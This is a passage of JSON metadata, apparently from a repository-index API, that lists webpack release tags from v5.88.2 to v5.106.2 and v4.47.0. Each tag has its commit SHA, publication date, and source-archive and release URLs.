:"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/